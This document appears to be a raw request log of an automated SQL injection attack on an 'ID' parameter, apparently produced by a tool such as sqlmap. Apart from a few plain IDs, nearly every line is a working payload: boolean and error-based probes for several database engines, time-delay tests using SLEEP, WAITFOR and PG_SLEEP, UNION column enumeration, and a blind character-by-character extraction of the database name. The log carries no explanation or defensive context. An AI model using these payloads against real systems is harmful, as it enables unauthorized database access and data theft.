ID:1
ID:1
ID:1
ID:2
ID:3
ID:4
ID:1'
ID:1'and '1'='1
ID:1
ID:1' and 1
ID:1' 
ID:1
ID:1'#
ID:1'and '1'='1'#
ID:1''
ID:1
ID:1
ID:1
ID:1".,("(')).
ID:1'qSWnBj<'">nMIrPx
ID:1) AND 7218=5229 AND (8162=8162
ID:1) AND 7807=7807 AND (1951=1951
ID:1 AND 8901=7231
ID:1 AND 7807=7807
ID:1 AND 9276=3520-- VRSC
ID:1 AND 7807=7807-- HDNk
ID:1') AND 6841=8408 AND ('lIeN'='lIeN
ID:1') AND 7807=7807 AND ('EaLa'='EaLa
ID:1' AND 8063=2775 AND 'GndE'='GndE
ID:1' AND 7807=7807 AND 'oGvN'='oGvN
ID:1' AND 8763=7024 AND 'DtMs'='DtMs
ID:1' AND (SELECT CHR(80)&CHR(68)&CHR(106)&CHR(83) FROM MSysAccessObjects)=CHR(80)&CHR(68)&CHR(106)&CHR(83) AND 'LkQJ'='LkQJ
ID:1' AND (SELECT CHR(75)||CHR(107)||CHR(115)||CHR(85) FROM SYSIBM.SYSDUMMY1)=CHR(75)||CHR(107)||CHR(115)||CHR(85) AND 'drbi'='drbi
ID:1' AND (SELECT 'sDTH' FROM RDB$DATABASE)='sDTH' AND 'JQie'='JQie
ID:1' AND (SELECT CHAR(112)||CHAR(77)||CHAR(121)||CHAR(110) FROM INFORMATION_SCHEMA.SYSTEM_USERS)=CHAR(112)||CHAR(77)||CHAR(121)||CHAR(110) AND 'BsHd'='BsHd
ID:1' AND (SELECT 'jxTM' FROM VERSIONS)='jxTM' AND 'DwJF'='DwJF
ID:1' AND (SELECT CHAR(117)+CHAR(72)+CHAR(85)+CHAR(71))=CHAR(117)+CHAR(72)+CHAR(85)+CHAR(71) AND 'KbSn'='KbSn
ID:1' AND (SELECT CHAR(117)+CHAR(72)+CHAR(85)+CHAR(71))=CHAR(78)+CHAR(113)+CHAR(116)+CHAR(81) AND 'RomT'='RomT
ID:1' AND (SELECT 0x42565661)=0x42565661 AND 'HoXn'='HoXn
ID:1' AND (SELECT 0x42565661)=0x4e61716a AND 'qhmF'='qhmF
ID:1' AND (SELECT 1792 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(1792=1792,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'oYyO'='oYyO
ID:1' OR (SELECT 5380 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(5380=5380,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zjNi'='zjNi
ID:1' AND EXTRACTVALUE(2435,CONCAT(0x5c,0x7162767071,(SELECT (ELT(2435=2435,1))),0x716b6a6a71)) AND 'kuAC'='kuAC
ID:1' OR EXTRACTVALUE(2318,CONCAT(0x5c,0x7162767071,(SELECT (ELT(2318=2318,1))),0x716b6a6a71)) AND 'dkVy'='dkVy
ID:1' AND UPDATEXML(9586,CONCAT(0x2e,0x7162767071,(SELECT (ELT(9586=9586,1))),0x716b6a6a71),6238) AND 'LCmL'='LCmL
ID:1' OR UPDATEXML(8057,CONCAT(0x2e,0x7162767071,(SELECT (ELT(8057=8057,1))),0x716b6a6a71),6680) AND 'hWag'='hWag
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(7747=7747,1))),0x716b6a6a71,0x78))x)) AND 'LpJw'='LpJw
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(2716=2716,1))),0x716b6a6a71,0x78))x)) AND 'vlsw'='vlsw
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(5404=5404,1))),0x716b6a6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'CCxl'='CCxl
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(7046=7046,1))),0x716b6a6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'ryAo'='ryAo
ID:1' AND ROW(5764,6812)>(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(5764=5764,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 5481 UNION SELECT 4723 UNION SELECT 5065 UNION SELECT 9922)a GROUP BY x) AND 'tWwM'='tWwM
ID:1' OR ROW(6244,4968)>(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(6244=6244,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 4210 UNION SELECT 4165 UNION SELECT 1255 UNION SELECT 9426)a GROUP BY x) AND 'sBiF'='sBiF
ID:-1059
ID:-1963' OR 1 GROUP BY CONCAT(0x7162767071,(SELECT (CASE WHEN (3071=3071) THEN 1 ELSE 0 END)),0x716b6a6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
ID:1' AND 7188=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (7188=7188) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC) AND 'iEdI'='iEdI
ID:1' AND 8528=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8528=8528) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'oWhs'='oWhs
ID:1' AND 6700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (6700=6700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(106)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'Kojf'='Kojf
ID:1' PROCEDURE ANALYSE(EXTRACTVALUE(7546,CONCAT(0x5c,0x7162767071,(SELECT (CASE WHEN (7546=7546) THEN 1 ELSE 0 END)),0x716b6a6a71)),1) AND 'YPAL'='YPAL
ID:(SELECT CONCAT(0x7162767071,(SELECT (ELT(6827=6827,1))),0x716b6a6a71))
ID:(SELECT (CHR(113)||CHR(98)||CHR(118)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8364=8364) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(106)||CHR(106)||CHR(113)))
ID:(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8234=8234) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))kkPL)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))Gjjo) AND 'lcYh'='lcYh
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'qnDW'='qnDW
ID:1';SELECT BENCHMARK(5000000,MD5(0x77765572))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x6f6b6666)) AND 'FSmK'='FSmK
ID:1';SELECT PG_SLEEP(5)--
ID:1';WAITFOR DELAY '0:0:5'--
ID:1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(65)||CHR(100)||CHR(112),5) FROM DUAL--
ID:1' AND (SELECT * FROM (SELECT(SLEEP(5)))ZXJh) AND 'QbDh'='QbDh
ID:1' AND (SELECT * FROM (SELECT(SLEEP(5)))ZXJh) AND 'QbDh'='QbDh
ID:1' ORDER BY 1-- -
ID:1' UNION ALL SELECT NULL-- -
ID:1' UNION ALL SELECT NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x78766c62494453536d7358696e456959477457424577454d744651504b64687241535a666f676266,0x716b6a6a71)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7162767071,0x6b667a75654d647565595472575778766b43436a4c7059516a556c5747704a52477362564646636f,0x716b6a6a71),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7162767071,0x615770686464454b70435a63514759785861724c52527072696c4e5964544a594b516f736c505154,0x716b6a6a71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x57796f61644c47426b59,0x716b6a6a71)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7162767071,0x6943724f45414155654a,0x716b6a6a71),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7162767071,0x6472414e75445a4c4b6a,0x716b6a6a71),NULL,NULL-- -
ID:-4375' UNION ALL SELECT CONCAT(0x7162767071,0x41754e494b5349696e75427161756a4669577468466248674c5858476b6f436e63704d5958487a45,0x716b6a6a71),NULL,NULL-- -
ID:-7937' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x516e68626f6c6c4d665346764a57554a5853436b76454547716441456d5349624a704f744d425250,0x716b6a6a71)-- -
ID:-9421' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (5391=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5391) THEN 1 ELSE 0 END),0x716b6a6a71)-- -
ID:-2682' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x716b6a6a71)-- -
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>104 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>100 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>102 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>101 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>104 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>100 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>98 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>99 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>120 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>116 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>118 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>117 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>120 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>116 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>114 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>113 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>104 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>108 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>106 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>105 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>120 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>116 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>114 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>115 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>96 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>112 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>120 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>124 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>122 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>121 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>64 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>32 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>16 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>8 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>4 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>2 AND 'sLaz'='sLaz
ID:1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>1 AND 'sLaz'='sLaz
ID:1
ID:-3771' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x716b6a6a71)-- -
ID:1
